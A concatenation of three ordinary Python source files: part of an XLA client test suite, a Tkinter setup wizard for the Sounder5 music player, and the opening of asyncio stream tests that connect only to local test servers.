return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
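# Execute() blocks until infeed data arrives, so run it on a worker thread
# while the main thread feeds the infeed and reads back the outfeed.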
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.xla_data_pb2.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
Setup.py
|
try:
from tkinter import Toplevel, ttk, Canvas, StringVar, BooleanVar
from tkinter.filedialog import askdirectory
from typing import ClassVar
from Components.Debugger import Debugger
from os.path import isfile, join, isdir, basename, abspath
from time import sleep
from PIL import Image, ImageTk
from threading import Thread
except ImportError as err:
exit(err)
class SSetup(Toplevel):
def __init__(self: ClassVar, parent: ClassVar, settings: dict) -> None:
super().__init__(parent)
# variables
self.settings = settings
self.parent = parent
self.pages: int = 4
# hide window
self.withdraw()
# configure window
self.geometry(f'500x620+{int(self.winfo_x() + ((self.winfo_screenwidth() / 2) - 250))}+{int(self.winfo_y() + ((self.winfo_screenheight() / 2) - 310))}')
self.resizable(False, False)
self.title('Sounder configurator')
self.protocol('WM_DELETE_WINDOW', self.exit_app)
self.bind('<F12>', lambda _: Debugger(self))
# init layout
self.init_layout()
# load icons
self.load_icons()
# apply theme
self.apply_theme()
# init ui
self.init_ui()
# show window
self.deiconify()
def exit_app(self: ClassVar) -> None:
self.quit()
self.destroy()
def init_layout(self: ClassVar) -> None:
# init theme object
self.layout: ClassVar = ttk.Style()
# set theme to clam
self.layout.theme_use('clam')
# button
self.layout.layout('TButton', [('Button.padding', {'sticky': 'nswe', 'children': [('Button.label', {'sticky': 'nswe'})]})])
# radiobutton
self.layout.layout('TRadiobutton', [('Radiobutton.padding', {'sticky': 'nswe', 'children': [('Radiobutton.label', {'sticky': 'nswe'})]})])
# scrollbar
self.layout.layout('Vertical.TScrollbar', [('Vertical.Scrollbar.trough', {'children': [('Vertical.Scrollbar.thumb', {'expand': '1', 'sticky': 'nswe'})], 'sticky': 'ns'})])
def init_ui(self: ClassVar) -> None:
# variables
self.theme: StringVar = StringVar(value='System')
self.updates: BooleanVar = BooleanVar(value=True)
# setup panels
pages_panel: ClassVar = ttk.Frame(self)
pages_panel.pack(side='top', fill='both', expand=True)
# progress
self.progress_bar: ClassVar = ttk.Progressbar(self, maximum=self.pages * 100, value=0)
self.progress_bar.pack(side='bottom', fill='x')
# page 1
welcome_panel: ClassVar = ttk.Frame(pages_panel)
welcome_content: ClassVar = ttk.Frame(welcome_panel)
ttk.Label(welcome_content, text='Welcome to Sounder5!', style='second.TLabel').pack(side='top', pady=10, anchor='c')
ttk.Button(welcome_content, text='Start listening!', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(folder_panel)).pack(side='top', pady=10, anchor='c')
welcome_content.pack(anchor='c', padx=10, pady=10, expand=True)
welcome_panel.place(x=0, y=0, relwidth=1, relheight=1)
# page 2
folder_panel: ClassVar = ttk.Frame(pages_panel)
folder_scrollbar: ClassVar = ttk.Scrollbar(folder_panel)
folder_scrollbar.pack(side='right', fill='y')
ttk.Label(folder_panel, text='Let\'s start with music!', style='second.TLabel').pack(side='top', anchor='c', pady=(10, 0))
ttk.Label(folder_panel, text='Show us where you store your music.', style='third.TLabel').pack(side='top', anchor='c')
# player content
folder_canvas: ClassVar = Canvas(folder_panel, background=self['background'], bd=0, highlightthickness=0, yscrollcommand=folder_scrollbar.set, takefocus=False)
# link scrollbar to canvas
folder_scrollbar.configure(command=folder_canvas.yview)
self.folder_panels: ClassVar = ttk.Frame(folder_canvas)
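# keep the canvas scroll region in sync with the inner frame, and stretch
# the embedded window to the full canvas width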
self.folder_panels.bind('<Configure>', lambda _: folder_canvas.configure(scrollregion=folder_canvas.bbox("all")))
folder_window: ClassVar = folder_canvas.create_window((0, 0), window=self.folder_panels, anchor='nw')
folder_canvas.bind('<Configure>', lambda _: folder_canvas.itemconfigure(folder_window, width=folder_canvas.winfo_width(), height=0))
folder_canvas.pack(side='top', padx=10, pady=10, anchor='c', fill='both')
folder_buttons: ClassVar = ttk.Frame(folder_panel)
# add folder button
ttk.Button(folder_buttons, text='Add folder', image=self.icons['plus'], compound='left', style='second.TButton', command=self.add_folder).pack(side='left', pady=5, padx=(10, 25))
# skip / continue button
self.folder_button: ClassVar = ttk.Button(folder_buttons, text='Skip', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(appearance_panel))
self.folder_button.pack(side='right', pady=5, padx=(25, 10))
folder_buttons.pack(side='bottom', pady=5)
folder_panel.place(x=0, y=0, relwidth=1, relheight=1)
# page 3
appearance_panel: ClassVar = ttk.Frame(pages_panel)
ttk.Label(appearance_panel, text='Theme!', style='second.TLabel').pack(side='top', anchor='c', pady=(10, 0))
ttk.Label(appearance_panel, text='Shine bright like a star or be dark like a boss!', style='third.TLabel').pack(side='top', anchor='c')
appearance_content: ClassVar = ttk.Frame(appearance_panel)
ttk.Radiobutton(appearance_content, image=self.icons['brush'], text='Light', compound='left', variable=self.theme, value='Light', command=self.change_theme).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
ttk.Radiobutton(appearance_content, image=self.icons['brush'], text='Dark', compound='left', variable=self.theme, value='Dark', command=self.change_theme).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
ttk.Radiobutton(appearance_content, image=self.icons['brush'], text='System', compound='left', variable=self.theme, value='System', command=self.change_theme).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
appearance_content.pack(anchor='c', padx=10, pady=10, expand=True)
ttk.Button(appearance_panel, text='Next', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(updates_panel)).pack(side='bottom', pady=10, anchor='c')
appearance_panel.place(x=0, y=0, relwidth=1, relheight=1)
# page 4
updates_panel: ClassVar = ttk.Frame(pages_panel)
ttk.Label(updates_panel, text='Updates!', style='second.TLabel').pack(side='top', anchor='c', pady=(10, 0))
ttk.Label(updates_panel, text='That\'s right, everybody likes updates!', style='third.TLabel').pack(side='top', anchor='c')
updates_content: ClassVar = ttk.Frame(updates_panel)
ttk.Radiobutton(updates_content, image=self.icons['checkmark'], text='Yes, check for updates!', compound='left', value=True, variable=self.updates, command=self.change_updates).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
ttk.Radiobutton(updates_content, image=self.icons['delete'], text='No :(', compound='left', value=False, variable=self.updates, command=self.change_updates).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
updates_content.pack(anchor='c', padx=10, pady=10, expand=True)
ttk.Button(updates_panel, text='Next', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(final_panel)).pack(side='bottom', pady=10, anchor='c')
updates_panel.place(x=0, y=0, relwidth=1, relheight=1)
# final
final_panel: ClassVar = ttk.Frame(pages_panel)
final_content: ClassVar = ttk.Frame(final_panel)
ttk.Label(final_content, text='That\'s all!', style='second.TLabel').pack(side='top', pady=10, anchor='c')
ttk.Button(final_content, text='Finish', image=self.icons['checkmark'], compound='left', style='second.TButton', command=self.exit_app).pack(side='top', pady=10, anchor='c')
final_content.pack(anchor='c', padx=10, pady=10, expand=True)
final_panel.place(x=0, y=0, relwidth=1, relheight=1)
# show welcome panel
welcome_panel.lift()
def load_icons(self: ClassVar) -> None:
self.icons: dict = {
'arrow': (ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\left.png').resize((25, 25))), ImageTk.PhotoImage(Image.open('Resources\\Icons\\Dark\\right.png').resize((25, 25)))),
'logo': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\setup.png')),
'plus': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\plus.png').resize((25, 25))),
'folder': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\music_folder.png').resize((25, 25))),
'delete': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\delete.png').resize((25, 25))),
'brush': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\brush.png').resize((25, 25))),
'checkmark': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\checkmark.png').resize((25, 25))),
}
self.iconphoto(False, self.icons['logo'])
def apply_theme(self: ClassVar) -> None:
# window
self.configure(background='#212121')
# frame
self.layout.configure('TFrame', background='#212121')
self.layout.configure('second.TFrame', background='#111')
# label
self.layout.configure('TLabel', background='#111', relief='flat', font=('catamaran 13 bold'), foreground='#fff')
self.layout.configure('second.TLabel', background='#212121', font=('catamaran 30 bold'), anchor='c')
self.layout.configure('third.TLabel', background='#212121')
# radiobutton
self.layout.configure('TRadiobutton', background='#212121', relief='flat', font=('catamaran 13 bold'), foreground='#fff', anchor='w', padding=10, width=12)
self.layout.map('TRadiobutton', background=[('pressed', '!disabled', '#111'), ('active', '#111'), ('selected', '#111')])
# button
self.layout.configure('TButton', background='#111', relief='flat', font=('catamaran 13 bold'), foreground='#fff', anchor='w')
self.layout.map('TButton', background=[('pressed', '!disabled', '#212121'), ('active', '#212121'), ('selected', '#212121')])
self.layout.configure('second.TButton', anchor='c')
self.layout.configure('third.TButton', anchor='c', background='#fff', foreground='#000')
self.layout.map('third.TButton', background=[('pressed', '!disabled', '#eee'), ('active', '#eee'), ('selected', '#eee')])
# scrollbar
self.layout.configure('Vertical.TScrollbar', gripcount=0, relief='flat', background='#212121', darkcolor='#212121', lightcolor='#212121', troughcolor='#212121', bordercolor='#212121')
self.layout.map('Vertical.TScrollbar', background=[('pressed', '!disabled', '#111'), ('disabled', '#212121'), ('active', '#111'), ('!active', '#111')])
# scale
self.layout.configure('Horizontal.TProgressbar', foreground='#111', background='#111', lightcolor='#111', darkcolor='#111', bordercolor='#212121', troughcolor='#212121')
def add_folder(self: ClassVar) -> None:
temp_dir: str = askdirectory()
if temp_dir and temp_dir not in self.settings['folders']:
temp_dir = abspath(temp_dir)
# add folder to settings
self.settings['folders'].append(temp_dir)
# draw folder in app
folder_panel: ClassVar = ttk.Frame(self.folder_panels, style='second.TFrame')
path_label: ClassVar = ttk.Label(folder_panel, image=self.icons['folder'], text=basename(temp_dir), compound='left')
path_label.pack(side='left', anchor='c', fill='y', pady=10, padx=10)
ttk.Button(folder_panel, image=self.icons['delete'], takefocus=False, command=lambda: self.remove_folder(folder_panel, temp_dir)).pack(side='right', padx=10, anchor='c')
folder_panel.bind('<Leave>', lambda _: path_label.configure(text=basename(temp_dir)))
folder_panel.bind('<Enter>', lambda _: path_label.configure(text=temp_dir))
folder_panel.pack(side='top', fill='x', pady=5, padx=10)
self.folder_button.configure(text='Continue')
def remove_folder(self: ClassVar, panel: ClassVar, folder: str) -> None:
if folder in self.settings['folders']:
self.settings['folders'].remove(folder)
panel.destroy()
if len(self.settings['folders']) == 0:
self.folder_button.configure(text='Skip')
def change_theme(self: ClassVar) -> None:
theme: str = self.theme.get()
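# an explicit Light/Dark choice overrides the stored theme; 'System' leaves
# the saved settings untouched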
if theme != 'System':
self.settings['use_system_theme'] = False
self.settings['theme'] = theme
def change_updates(self: ClassVar) -> None:
self.settings['updates'] = self.updates.get()
def next_page(self: ClassVar, page: ClassVar) -> None:
Thread(target=self.update_progress, daemon=True).start()
page.lift()
def update_progress(self: ClassVar) -> None:
for _ in range(10):
self.progress_bar['value'] += 10
sleep(0.01)
if self.progress_bar['value'] == self.pages * 100:
self.progress_bar['value'] = 0
|
test_streams.py
|
"""Tests for streams.py."""
import gc
import os
import queue
import socket
import sys
import threading
import unittest
from unittest import mock
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio import test_utils
class StreamReaderTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader()
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
def test_open_connection_error(self):
